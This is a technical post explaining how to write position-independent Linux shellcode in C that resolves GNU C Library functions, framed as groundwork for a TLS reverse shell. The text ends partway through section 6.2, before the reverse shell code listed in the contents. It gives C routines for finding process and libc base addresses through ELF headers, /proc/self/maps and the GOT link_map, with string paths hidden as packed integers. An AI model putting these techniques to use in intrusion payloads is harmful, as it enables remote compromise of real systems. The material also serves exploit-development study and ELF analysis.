Shellcode: A reverse shell for Linux in C with support for TLS/SSL

  1. Introduction
  2. History
  3. Definitions
    1. Position-independent code (PIC)
    2. Position-independent executable (PIE)
    3. Thread Local Storage or Transport Layer Security (TLS)
    4. Address Space Layout Randomization (ASLR)
    5. Executable and Link Format (ELF)
  4. Base of Host Process
    1. Arbitrary Code Segment Address
    2. Process File System (procfs)
  5. ELF Layout
    1. File Header
    2. Program Header
    3. Section Header
    4. Dynamic Structure
    5. Symbol Structure
  6. Base of C Library (libc)
    1. Process File System (procfs)
    2. Global Offset Table (DT_PLTGOT)
    3. Debug Structure (DT_DEBUG)
    4. Thread Local Storage (TLS)
  7. Resolving Address of Functions
    1. ELF Hash Table (DT_HASH)
    2. GNU Hash Table (DT_GNU_HASH)
    3. Dynamic Symbol Table (DT_SYMTAB, DT_DYNSYM)
    4. Using Hash Algorithm (SHT_SYMTAB, SHT_DYNSYM)
  8. Loading Shared Objects
    1. __libc_dlopen_mode and __libc_dlsym
    2. Using /etc/ld.so.conf.d/
  9. Reverse Shell using SSL/TLS
    1. Data Table
    2. Strings
    3. Compiling
    4. Testing
  10. Summary

1. Introduction

This post describes how to implement position-independent code for Linux that can resolve the address of functions in the GNU C Library. The GNU Compiler Collection on an AMD64 build of Debian Linux is used to compile C source code, and the shellcode is then extracted from the resulting binary. Once you’re familiar with the entire process, writing shellcode for other architectures should be easier. There are many tutorials about writing shellcode for Linux using system calls, but very few, if any at all, using the GNU C Library. The lack of tutorials can be attributed to the fact that process management, file system operations and network connectivity can be easily implemented on Linux using system calls. In contrast with Linux, the Windows kernel is based on subsystems where the invocation of system calls is not a simple, straightforward process. Due to the complexity of system calls on Windows, it’s necessary to resolve the address of wrapper functions in Dynamic-link Libraries to do anything useful. This is why tutorials about writing shellcode in C for Windows well outnumber those for Linux.

For additional reading material, I would recommend reading Cheating the ELF – Subversive Dynamic Linking to Libraries by the grugq and the book Linux Binary Analysis by Ryan “elfmaster” O’Neill. There’s a lot of free reading material online that you can find with any good search engine. A PoC can be found here. The following screenshot shows the shellcode connected to the TCP/IP tool ncat that comes bundled with nmap.

[Screenshot: the shellcode connected to ncat]

2. History

The following table, in chronological order, highlights some examples of those using C to implement shellcode. There are probably many more than what I’ve listed. Feel free to email me the details of anyone else and I’ll update accordingly.

August 1999     Sebastian “stealth” Krahmer from Team TESO publishes Hellkit 1.1, a tool that converts C code into shellcode for Linux.
July 2003       Inspired by Hellkit, Philippe Biondi, the author of scapy, publishes shellforge, which uses a combination of C header files and Python to convert C source code into shellcode for Linux.
September 2003  Dave Aitel from ImmunitySec publishes MOSDEF, a C-like compiler that generates shellcode for Windows and Linux.
September 2006  Benjamin Caillat publishes WiShMaster, a tool that generates shellcode for Windows from C source code.
May 2010        Didier Stevens publishes an article on writing shellcode for Windows using C.
July 2010       Nick Harbour publishes an article on writing shellcode for Windows using C.
November 2011   Radare publishes ragg-cc, a shellcode compiler based on gcc and sflib (shellforge).
August 2013     Matt Graeber publishes an article on writing shellcode for Windows using C.
November 2013   Shellforge G4 is published. It’s a fork of shellforge now maintained by Albert Sellarès.
May 2014        humeafo publishes a shellcode compiler for Windows that uses llvm/clang.
December 2015   Binary Ninja publishes a shellcode compiler for Windows and Linux. Target architectures include x86, x64, arm, armeb, aarch64, mips, mipsel, ppc, ppcel.
May 2016        Jack Ullrich publishes an article on writing shellcode for Windows using C.
May 2016        Phrack publishes issue #69 with an article by Justin “fishstiqz” Fisher that describes using gcc-mingw to generate Windows shellcode in C.
June 2016       Guillaume Delugré publishes Shell-Factory, a tool that uses C++ to generate shellcode for Linux.
August 2016     Ixty publishes a shellcode generator that derives cross-platform shellcode for Linux targeting x86, amd64, aarch32 and aarch64.
November 2016   Ionut Popescu publishes a shellcode compiler for Windows.
January 2018    SheLLVM publishes a shellcode compiler for Windows.

3. Definitions

Brief descriptions of some abbreviations used in this post are provided for those unfamiliar with what they mean.

3.1 Position-independent code (PIC)

Position-independent code runs correctly regardless of where it resides in memory, which is compulsory for any shellcode. Unless a target binary is statically linked, dependencies should always be resolved dynamically.

3.2 Position-independent executables (PIE)

Executable binaries made entirely from PIC are mandatory on some systems lacking a Memory Management Unit. However, PIE is also used with Address Space Layout Randomization to increase the difficulty of exploiting vulnerabilities. The version of Debian I’m working with has a build of GCC that generates PIE binaries by default.

3.3 Thread Local Storage / Transport Layer Security (TLS)

TLS is synonymous with the protocol that protects the vast majority of online communications, but it can also refer to a local area of memory containing global variables that are only accessible to a single thread.

3.4 Address Space Layout Randomization (ASLR)

ASLR is a technique invented by The PaX Team and published in July 2001. It is intended to mitigate the exploitation of vulnerabilities by randomizing the memory addresses of a process, including the base of the executable, the stack, the heap and libraries. A statically linked binary that is not built as a PIE is always loaded at a fixed base address.

3.5 Executable and Link Format

Version 1.2 of the specification for the Executable and Link Format (ELF) was published in May 1995 by the Tool Interface Standards (TIS) Committee. Before attempting to locate the base address of the GNU C Library and any of its exported functions, it’s important to familiarize yourself with the structure of an ELF binary.

4. Base of Host Process

There are three ways to obtain the base address of the host process, or two depending on where the shellcode resides in memory. For shellcode running inside an executable segment of the host, simply read the value of the instruction pointer/program counter, align it down to a page boundary and then repeatedly subtract PAGE_SIZE (usually 4096 bytes) until a valid ELF header is found. If the shellcode is running from executable memory allocated by the mmap function, we can try reading the address from /proc/self/maps using system calls, or somehow obtain an arbitrary address from the stack or heap. You can also try reading the base address of libc.so from the Thread Local Storage (TLS) and obtain the link_map structure that contains the base address. I discuss this last approach in section 6.4 when finding the base of libc.so.

4.1 Arbitrary Code Address

The get_rip() function uses inline AMD64 assembly to load the current value of the Instruction Pointer (IP) into the RAX register before returning. The get_base function then compares the first 32 bits (4 bytes) at the page-aligned address with the magic value normally found at the start of an ELF binary. The search continues by subtracting PAGE_SIZE (4096 bytes) until it either finds the base address or crashes on an unmapped page. There are of course ways to avoid crashing using system calls.

void* get_rip(void) {
    void* ret;

    __asm__ __volatile__ (
      "lea (%%rip), %%rax\n"
      ".globl get_rip_label	\n"
      "get_rip_label:		    \n"
      "mov %%rax, %0"
      : "=r"(ret)   // output
      :             // no inputs
      : "rax");     // tell the compiler that rax is overwritten

    return ret;
}

void *get_base(void* addr) {
    uint64_t base = (uint64_t)addr;
    
    // align down
    base &= -4096;
    
    // equal to the ELF magic (0x7f 'E' 'L' 'F' read as a little-endian word)?
    while (*(uint32_t*)base != 0x464c457fUL) {
      base -= 4096;
    }
    return (void*)base;
}

4.2 Process File System

/proc/self/maps contains a list of memory ranges, their permissions and the path of the module mapped into each range. The first address found should belong to the host process. The following code reads the first address, converts the string to binary and returns it. The system calls (_open, _read and _close) are implemented using inline assembly that might look suspicious.

uint64_t hex2bin(const char hex[]) {
    uint64_t r=0;
    char     c;
    int      i;
    
    for(i=0; i<16; i++) {
      c = hex[i];
      if(c >= '0' && c <= '9') { 
        c = c - '0';
      } else if(c >= 'a' && c <= 'f') {
        c = c - 'a' + 10;
      } else if(c >= 'A' && c <= 'F') {
        c = c - 'A' + 10;
      } else break;
      r *= 16;
      r += c;
    }
    return r;
}

void *get_base(void) {
    int  maps;
    void *addr;
    char line[32];
    int  str[8];
    
    // /proc/self/maps
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;
    
    maps = _open((char*)str, O_RDONLY, 0);
    // a failed open returns a negative value, not zero
    if(maps < 0) return NULL;
    
    _read(maps, line, 16);
    _close(maps);
    
    addr = (void*)hex2bin(line);
    return addr;
}

If the system has patches by Grsecurity installed and GRKERNSEC_PROC_MEMMAP is enabled, this code will not work because the option removes addresses from /proc/[pid]/[smaps|maps|stat].
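
The integer constants assigned to str[] in get_base are the path /proc/self/maps packed four bytes at a time in little-endian order, which lets the string be built on the stack from immediate values instead of being referenced from a data section. The following is a minimal sketch of how such constants can be derived. pack4 is a hypothetical helper of my own for illustration and isn't part of the shellcode.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

// Pack up to four characters of s into a 32-bit word with the first
// character in the lowest byte, which is the order a little-endian CPU
// such as AMD64 stores the word in memory.
// Hypothetical helper, for illustration only.
static uint32_t pack4(const char *s) {
    uint32_t w = 0;
    size_t   i, n;

    assert(s != NULL);
    n = strlen(s);

    for (i = 0; i < 4 && i < n; i++) {
        w |= (uint32_t)(unsigned char)s[i] << (8 * i);
    }
    // bytes past the end of a short string stay zero and
    // double as the null terminator
    return w;
}
```

Calling pack4 on "/pro", "c/se", "lf/m" and "aps" yields the four values stored in str[0] to str[3].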

5. ELF Layout

Parsing ELF files in memory is required if you want to find the address of functions. I will only discuss what’s necessary to locate the symbol, string and hash tables.

5.1 File Header

This is the most important header of all. Every valid ELF executable and shared object should begin with this file header. The binary is interpreted using the following structure.

typedef struct {
  unsigned char e_ident[EI_NIDENT]; /* File identification.              */
  Elf64_Half  e_type;               /* File type.                        */
  Elf64_Half  e_machine;            /* Machine architecture.             */
  Elf64_Word  e_version;            /* ELF format version.               */
  Elf64_Addr  e_entry;              /* Entry point.                      */
  Elf64_Off   e_phoff;              /* Program header file offset.       */
  Elf64_Off   e_shoff;              /* Section header file offset.       */
  Elf64_Word  e_flags;              /* Architecture-specific flags.      */
  Elf64_Half  e_ehsize;             /* Size of ELF header in bytes.      */
  Elf64_Half  e_phentsize;          /* Size of program header entry.     */
  Elf64_Half  e_phnum;              /* Number of program header entries. */
  Elf64_Half  e_shentsize;          /* Size of section header entry.     */
  Elf64_Half  e_shnum;              /* Number of section header entries. */
  Elf64_Half  e_shstrndx;           /* Section name strings section.     */
} Elf64_Ehdr;

The only fields we need to concern ourselves with for the shellcode are e_ident, e_phoff, e_phnum, e_shoff and e_shnum. The following shows the header for /bin/ls using: readelf -h /bin/ls

  ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x5430
  Start of program headers:          64 (bytes into file)
  Start of section headers:          128816 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         30
  Section header string table index: 29
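
Before trusting e_phoff or e_phnum, it can help to check a little more than the four magic bytes. The following sketch validates the fields of e_ident shown in the readelf output above using the constants from elf.h. The function names elf_is_valid64 and elf_is_pie_or_so are my own and only assume a 64-bit little-endian AMD64 target.

```c
#include <assert.h>
#include <elf.h>
#include <string.h>

// Return 1 if hdr looks like a 64-bit little-endian AMD64 ELF header.
// Hypothetical helper, for illustration only.
static int elf_is_valid64(const Elf64_Ehdr *hdr) {
    assert(hdr != NULL);

    // 0x7f 'E' 'L' 'F'
    if (memcmp(hdr->e_ident, ELFMAG, SELFMAG) != 0) return 0;
    // Class: ELF64
    if (hdr->e_ident[EI_CLASS] != ELFCLASS64) return 0;
    // Data: 2's complement, little endian
    if (hdr->e_ident[EI_DATA] != ELFDATA2LSB) return 0;
    // Machine: Advanced Micro Devices X86-64
    if (hdr->e_machine != EM_X86_64) return 0;
    // program header entries must be the size the parser expects
    if (hdr->e_phnum != 0 && hdr->e_phentsize != sizeof(Elf64_Phdr)) return 0;

    return 1;
}

// ET_DYN is used for shared objects and for PIE executables alike,
// which is why readelf reports /bin/ls as "DYN (Shared object file)".
static int elf_is_pie_or_so(const Elf64_Ehdr *hdr) {
    return hdr->e_type == ET_DYN;
}
```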

5.2 Program Header

To resolve the address of functions, we only need to work with PT_DYNAMIC and PT_LOAD types. PT_LOAD indicates a loadable program segment such as code (.text) or data (.data). An ELF binary should always have at least one PT_LOAD header, but if PT_DYNAMIC is missing, this indicates the binary has been linked statically and requires resolving functions via the section headers read from disk. Of course, you can always use hardcoded addresses.

typedef struct {
  Elf64_Word  p_type;               /* Entry type.                       */
  Elf64_Word  p_flags;              /* Access permission flags.          */
  Elf64_Off   p_offset;             /* File offset of contents.          */
  Elf64_Addr  p_vaddr;              /* Virtual address in memory image.  */
  Elf64_Addr  p_paddr;              /* Physical address (not used).      */
  Elf64_Xword p_filesz;             /* Size of contents in file.         */
  Elf64_Xword p_memsz;              /* Size of contents in memory.       */
  Elf64_Xword p_align;              /* Alignment in memory and file.     */
} Elf64_Phdr;

Example of dumping program headers for /bin/ls using: readelf -l /bin/ls

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
                 0x00000000000001f8 0x00000000000001f8  R E    0x8
  INTERP         0x0000000000000238 0x0000000000000238 0x0000000000000238
                 0x000000000000001c 0x000000000000001c  R      0x1
      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x000000000001e184 0x000000000001e184  R E    0x200000
  LOAD           0x000000000001e388 0x000000000021e388 0x000000000021e388
                 0x0000000000001260 0x0000000000002440  RW     0x200000
  DYNAMIC        0x000000000001edb8 0x000000000021edb8 0x000000000021edb8
                 0x00000000000001f0 0x00000000000001f0  RW     0x8
  NOTE           0x0000000000000254 0x0000000000000254 0x0000000000000254
                 0x0000000000000044 0x0000000000000044  R      0x4
  GNU_EH_FRAME   0x000000000001ab74 0x000000000001ab74 0x000000000001ab74
                 0x000000000000082c 0x000000000000082c  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x000000000001e388 0x000000000021e388 0x000000000021e388
                 0x0000000000000c78 0x0000000000000c78  R      0x1

The LOAD header with a FileSiz of 0x1e184 is the code segment that contains .text. We know this because the flags have Read(R) and Execute(E). The other LOAD header has Read(R) and Write(W) flags, and is the data segment that contains .data. The only time you will see all three together (RWE) is in the OMAGIC format or a potentially malicious binary, of course. The following code, when provided the base address of an ELF, will return the first program header of the requested type, or NULL if one can’t be found.

// return pointer to program header
Elf64_Phdr *elf_get_phdr(void *base, int type) {
    int        i;
    Elf64_Ehdr *ehdr;
    Elf64_Phdr *phdr;
    
    // sanity check on base and type
    if(base == NULL || type == PT_NULL) return NULL;
    
    // ensure this has some semblance of an ELF header
    if(*(uint32_t*)base != 0x464c457fUL) return NULL;
    
    // ok get offset to the program headers
    // (cast to a byte pointer: arithmetic on void* is a GNU extension)
    ehdr=(Elf64_Ehdr*)base;
    phdr=(Elf64_Phdr*)((uint8_t*)base + ehdr->e_phoff);
    
    // search through list to find requested type
    for(i=0; i<ehdr->e_phnum; i++) {
      // if found
      if(phdr[i].p_type == type) {
        // return pointer to it
        return &phdr[i];
      }
    }
    // return NULL if not found
    return NULL;
}
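
Since elf_get_phdr only returns the first header of a type, it can't distinguish between the two LOAD headers shown earlier. The following sketch selects a PT_LOAD header by its permission flags instead. find_load is a hypothetical name and it takes a pointer to the program header array rather than the ELF base, purely to keep the example short.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>

// Return the first PT_LOAD entry whose p_flags contain every bit in flags,
// or NULL if there is none. phdr points to an array of n program headers.
// Hypothetical helper, for illustration only.
static const Elf64_Phdr *find_load(const Elf64_Phdr *phdr, int n,
                                   Elf64_Word flags) {
    int i;

    assert(phdr != NULL);

    for (i = 0; i < n; i++) {
        if (phdr[i].p_type == PT_LOAD &&
            (phdr[i].p_flags & flags) == flags) {
            return &phdr[i];
        }
    }
    return NULL;
}
```

Passing PF_X would select the code segment and PF_W the data segment. Asking for PF_W | PF_X should return NULL for any well-behaved binary.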

5.3 Section Headers

There are at least two ways to calculate the number of entries in the symbol table. The first is by dividing Elf64_Shdr.sh_size for SHT_SYMTAB or SHT_DYNSYM by sizeof(Elf64_Sym) or by the DT_SYMENT value from the dynamic section. The other way is using the nchain value from the DT_HASH structure. The problem is that DT_HASH is not always available. In its place will be DT_GNU_HASH, which does not directly indicate how many entries are in the symbol table. For the shellcode, I use a method that works for both statically and dynamically linked binaries, but it requires opening the file on disk and mapping it into memory.

typedef struct {
       Elf64_Word      sh_name;       /* index to name of section in string table */
       Elf64_Word      sh_type;       /* type of section                          */
       Elf64_Xword     sh_flags;      /* section flags                            */
       Elf64_Addr      sh_addr;       /* memory address of section                */
       Elf64_Off       sh_offset;     /* file offset for section                  */
       Elf64_Xword     sh_size;       /* size of section                          */
       Elf64_Word      sh_link;       /* index to associated                      */
       Elf64_Word      sh_info;       /* extra info about section                 */
       Elf64_Xword     sh_addralign;  /* aligned address                          */
       Elf64_Xword     sh_entsize;    /* size of entry if section is a table      */
} Elf64_Shdr;

The only fields required here are sh_type, sh_offset, sh_size and sh_link. An example of processing the symbol table via section headers is in get_proc_address3.
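
The two ways of counting symbols described at the start of this section can be sketched as follows. Both function names are my own. The second assumes the DT_HASH layout used on AMD64, where the table is an array of 32-bit words that begins with nbucket and nchain.

```c
#include <assert.h>
#include <elf.h>
#include <stdint.h>

// Number of entries in a symbol table section: sh_size divided by the
// size of one entry. Falls back to sizeof(Elf64_Sym) if sh_entsize is 0.
// Hypothetical helper, for illustration only.
static uint64_t symcount_from_shdr(const Elf64_Shdr *sh) {
    uint64_t entsize;

    assert(sh->sh_type == SHT_SYMTAB || sh->sh_type == SHT_DYNSYM);

    entsize = sh->sh_entsize ? sh->sh_entsize : sizeof(Elf64_Sym);
    return sh->sh_size / entsize;
}

// hash points to the table referenced by DT_HASH:
//   hash[0] = nbucket, hash[1] = nchain, then the buckets and chains.
// nchain equals the number of entries in the symbol table.
static uint32_t symcount_from_hash(const uint32_t *hash) {
    return hash[1];
}
```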

5.4 Dynamic Structure

The .dynamic section or table contains a list of dynamic entries, each of which can be interpreted using the following structure.

typedef struct {
  Elf64_Sxword  d_tag;              /* Entry type.    */
  union {
    Elf64_Xword d_val;              /* Integer value. */
    Elf64_Addr  d_ptr;              /* Address value. */
  } d_un;
} Elf64_Dyn;

The following d_tag values can be used to find specific types. A d_tag value of DT_NULL indicates where the section/table ends.

Type         Description                                                   Value       d_un
DT_PLTGOT    Pointer to the Procedure Linkage Table / Global Offset Table  3           d_ptr
DT_HASH      ELF hash used to locate symbol                                4           d_ptr
DT_GNU_HASH  GNU style hash used to locate symbol                          0x6ffffef5  d_ptr
DT_STRTAB    Pointer to the string table                                   5           d_ptr
DT_SYMTAB    Pointer to the symbol table                                   6           d_ptr
DT_SYMENT    The size of a symbol entry                                    11          d_val
DT_SONAME    Index in string table to the Shared Object name               14          d_val
DT_DEBUG     Pointer to an r_debug structure containing the link_map       21          d_ptr

Example of dumping the dynamic section for /bin/ls using: readelf -d /bin/ls

Dynamic section at offset 0x1edb8 contains 27 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libselinux.so.1]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000c (INIT)               0x34c8
 0x000000000000000d (FINI)               0x15c4c
 0x0000000000000019 (INIT_ARRAY)         0x21e388
 0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)
 0x000000000000001a (FINI_ARRAY)         0x21e390
 0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
 0x000000006ffffef5 (GNU_HASH)           0x298
 0x0000000000000005 (STRTAB)             0x1010
 0x0000000000000006 (SYMTAB)             0x350
 0x000000000000000a (STRSZ)              1501 (bytes)
 0x000000000000000b (SYMENT)             24 (bytes)
 0x0000000000000015 (DEBUG)              0x0
 0x0000000000000003 (PLTGOT)             0x21f000
 0x0000000000000002 (PLTRELSZ)           2544 (bytes)
 0x0000000000000014 (PLTREL)             RELA
 0x0000000000000017 (JMPREL)             0x2ad8
 0x0000000000000007 (RELA)               0x1770
 0x0000000000000008 (RELASZ)             4968 (bytes)
 0x0000000000000009 (RELAENT)            24 (bytes)
 0x000000006ffffffb (FLAGS_1)            Flags: PIE
 0x000000006ffffffe (VERNEED)            0x1700
 0x000000006fffffff (VERNEEDNUM)         1
 0x000000006ffffff0 (VERSYM)             0x15ee
 0x000000006ffffff9 (RELACOUNT)          192
 0x0000000000000000 (NULL)               0x0

Take a look at the following .dynamic section for libc.so and notice the entry of type SONAME, which is the “shared object name”. To read this, add Elf64_Dyn.d_un.d_val for DT_SONAME to the Elf64_Dyn.d_un.d_ptr for DT_STRTAB and it will give you a pointer to the string “libc.so.6”.

Dynamic section at offset 0x198ba0 contains 26 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [ld-linux-x86-64.so.2]
 0x000000000000000e (SONAME)             Library soname: [libc.so.6]
 .....
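
Reading the SONAME as described above can be sketched like this. dyn_find and dyn_soname are hypothetical names, and the sketch assumes the d_ptr of DT_STRTAB already holds a usable pointer. If it holds an unrelocated virtual address instead, the value returned by something like elf_get_delta would need to be added first.

```c
#include <assert.h>
#include <elf.h>
#include <stdint.h>
#include <string.h>

// Find the first entry with the given tag in a DT_NULL terminated array.
// Hypothetical helper, for illustration only.
static const Elf64_Dyn *dyn_find(const Elf64_Dyn *dyn, Elf64_Sxword tag) {
    for (; dyn->d_tag != DT_NULL; dyn++) {
        if (dyn->d_tag == tag) return dyn;
    }
    return NULL;
}

// Return the shared object name, or NULL if either DT_SONAME or
// DT_STRTAB is missing from the dynamic section.
static const char *dyn_soname(const Elf64_Dyn *dyn) {
    const Elf64_Dyn *strtab, *soname;

    assert(dyn != NULL);

    strtab = dyn_find(dyn, DT_STRTAB);
    soname = dyn_find(dyn, DT_SONAME);
    if (strtab == NULL || soname == NULL) return NULL;

    // string table pointer + index of the name inside it
    return (const char *)(uintptr_t)strtab->d_un.d_ptr + soname->d_un.d_val;
}
```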

The following code is used to locate a dynamic type.

uint64_t elf_get_delta(void *base) {
    Elf64_Phdr *phdr;
    uint64_t   low = 0; // stays zero if no PT_LOAD header is found
    
    // get pointer to PT_LOAD header
    // first should be executable
    phdr = elf_get_phdr(base, PT_LOAD);
    
    if(phdr != NULL) {
      low = phdr->p_vaddr;
    }
    return (uint64_t)base - low;
}

// return pointer to first dynamic type found
Elf64_Dyn *elf_get_dyn(void *base, int tag) {
    Elf64_Phdr *dynamic;
    Elf64_Dyn  *entry;
    
    // 1. obtain pointer to DYNAMIC program header
    dynamic = elf_get_phdr(base, PT_DYNAMIC);

    if(dynamic != NULL) {
      entry = (Elf64_Dyn*)(dynamic->p_vaddr + elf_get_delta(base));
      // 2. obtain pointer to type
      while(entry->d_tag != DT_NULL) {
        if(entry->d_tag == tag) {
          return entry;
        }
        entry++;
      }
    }
    return NULL;
}

5.5 Symbol Structure

If a binary is being read from disk, the section headers can be used to calculate the location of the symbol table and how many entries it has. Symbol table sections can be identified by checking the sh_type field of each section header for SHT_SYMTAB or SHT_DYNSYM. You may be asking yourself, what’s the difference? Typically, object files will contain a .symtab section for the linker, but no .dynsym section. ELF binaries that are dynamically linked will contain a .dynsym section, and usually no .symtab section once they have been stripped. However, if the application is statically linked, the binary will only contain a .symtab section. In practice, you should check for both in the event that only one exists.

If a binary is being read from memory that was already mapped by the ELF dynamic linker/loader, the section headers won’t be available and there’s only the dynamic program header (PT_DYNAMIC) to work with. DT_STRTAB, DT_SYMTAB and either DT_HASH or DT_GNU_HASH are required for locating the address of functions using the .dynamic section. get_proc_address demonstrates how to look up a symbol by ELF or GNU hash.

typedef struct {
  Elf64_Word    st_name;            /* String table index of name.   */
  unsigned char st_info;            /* Type and binding information. */
  unsigned char st_other;           /* Reserved (not used).          */
  Elf64_Half    st_shndx;           /* Section index of symbol.      */
  Elf64_Addr    st_value;           /* Symbol value.                 */
  Elf64_Xword   st_size;            /* Size of associated object.    */
} Elf64_Sym;

Symbol table '.dynsym' contains 136 entries:
   Num:    Value          Size Type    Bind   Vis      Ndx Name
     0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __uflow@GLIBC_2.2.5 (3)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigprocmask@GLIBC_2.2.5 (3)
     5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __snprintf_chk@GLIBC_2.3.4 (4)
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND raise@GLIBC_2.2.5 (3)
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND free@GLIBC_2.2.5 (3)
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND abort@GLIBC_2.2.5 (3)
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __errno_location@GLIBC_2.2.5 (3)
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strncmp@GLIBC_2.2.5 (3)

6. Base of C Library

Although I describe obtaining the base address of the host process in section 4, it’s only necessary to obtain the base address of libc.so. We will now examine a number of ways to do this.

6.1 Process Maps File (procfs)

A popular method is by parsing /proc/[pid]/maps where [pid] is the target process id. Using “self” in place of [pid] will query the current process space.

int read_line(int fd, char *buf, int buflen) {
    int  len;
    
    if(buflen==0) return 0;
    
    for(len=0; len < (buflen - 1); len++) {
      // read a byte. exit on EOF or error
      if(_read(fd, &buf[len], 1) <= 0) break;
      // exit loop when new line found
      if(buf[len] == '\n') {
        buf[len] = 0;
        break;
      }
    }
    return len;
}

int is_exec(char line[]) {
    char *s = line;
    
    // find the first space
    // but ensure we don't skip newline or null terminator
    while(*s && *s != '\n' && *s != ' ') s++;
    
    // space?
    if(*s == ' ') {
      do {
        s++; // skip 1
        // execute flag?
        if(*s == 'x') return 1;
      // until we reach null terminator, newline or space
      } while (*s && *s != '\n' && *s != ' ');
    }
    return 0;
}

void *get_module_handle1(const char *module) {
    int  maps;
    void *base=NULL, *start_addr;
    char line[PATH_MAX];
    int  str[8], len;
    
    // /proc/self/maps
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;
    
    // 1. open /proc/self/maps
    maps = _open((char*)str, O_RDONLY, 0);
    if(maps < 0) return NULL;
    
    // 2. until EOF or module found
    for(;;) {
      // 3. read a line, never more than the buffer can hold
      len = read_line(maps, line, sizeof(line));
      if(len == 0) break;
      // 4. ensure the line is null terminated
      line[len] = 0;
      // if permissions disallow execution, skip it
      if(!is_exec(line)) {
        continue;
      }
      start_addr = (void*)hex2bin(line);
      // 5. first address should be the base of host process
      // if no module is requested, return this address
      if(module == 0) {
        base = start_addr;
        break;
      }
      // 6. check if module name is in line
      if(_strstr(line, module)) {
        base = start_addr;
        break;
      }
    }
    _close(maps);
    return base;
}
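
When testing from an ordinary program rather than shellcode, the result of get_module_handle1 can be cross-checked with a version that relies on the C library. This sketch deliberately swaps the hand-written helpers for sscanf and strstr, so it's a debugging aid and not something that can be used in the shellcode itself. parse_maps_line and match_module are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

// Split one line of /proc/[pid]/maps into its start address, end address,
// permission string and (possibly empty) path. Returns 1 on success.
// Hypothetical helper, for illustration only.
static int parse_maps_line(const char *line, uint64_t *start, uint64_t *end,
                           char perms[5], char *path, size_t pathlen) {
    unsigned long long lo, hi;
    int                off = 0;

    assert(line != NULL && path != NULL && pathlen > 0);
    path[0] = 0;

    // layout: start-end perms offset dev inode [path]
    // %n records where the path begins; it stays 0 if the line ends early
    if (sscanf(line, "%llx-%llx %4s %*s %*s %*s %n",
               &lo, &hi, perms, &off) < 3) {
        return 0;
    }
    if (off > 0) {
        snprintf(path, pathlen, "%s", line + off);
        path[strcspn(path, "\n")] = 0;   // drop the trailing newline
    }
    *start = lo;
    *end   = hi;
    return 1;
}

// Return the start address if the mapping is executable and its path
// contains module (or module is NULL). Otherwise return 0.
static uint64_t match_module(const char *line, const char *module) {
    uint64_t start, end;
    char     perms[5], path[256];

    if (!parse_maps_line(line, &start, &end, perms, path, sizeof(path))) {
        return 0;
    }
    if (perms[2] != 'x') return 0;       // permissions look like "r-xp"
    if (module != NULL && strstr(path, module) == NULL) return 0;
    return start;
}
```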

6.2 Global Offset Table (DT_PLTGOT)

In May 2002, the grugq provided an example of how to locate the link_map structure stored in the GOT that can then be used to resolve the base address of libc.so. In 2007, herm1t showed another way in INT 0x80? No, thank you! that finds it using the address of libc.so functions rather than the link_map. Either way works, but the method shown here is based on the post by the grugq. The following structure defines the link_map. Note, the structure defined in link.h is much more detailed, but this is really all that’s required to obtain the base address of shared objects.

struct link_map {
    ElfW(Addr) l_addr;		/* Difference between the address in the ELF
				   file and the addresses in memory.  */
    char *l_name;		/* Absolute file name object was found in.  */
    ElfW(Dyn) *l_ld;		/* Dynamic section of the shared object.  */
    struct link_map *l_next, *l_prev; /* Chain of loaded objects.  */
};

The link_map can be found in various ways, but the most popular seems to be via dynamic structures of type DT_PLTGOT and DT_DEBUG.

GOT Index  Description
0          Relative Virtual Address of .dynamic program header (PT_DYNAMIC)
1          Pointer to link_map structure
2          Pointer to _dl_runtime_resolve function in dynamic linker/loader

The following function will retrieve the address of the GOT, extract a pointer to the link_map structure and search for the requested module by name. If no module is provided, the first entry in the list (which happens to be the host process) is returned. This is similar to how GetModuleHandle works on Windows. However, it’s worth noting that because of how shared objects on Linux are named, the module name provided to this function doesn’t need to be exact. A partial name is sufficient, but that makes it more prone to return the wrong entry.

void *get_module_handle2(const char *module) {
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *got;
    void            *addr=NULL, *base;
    uint64_t        *ptrs;
    struct link_map *map;
    
    // 1. get the base of host ELF
    base = get_base();
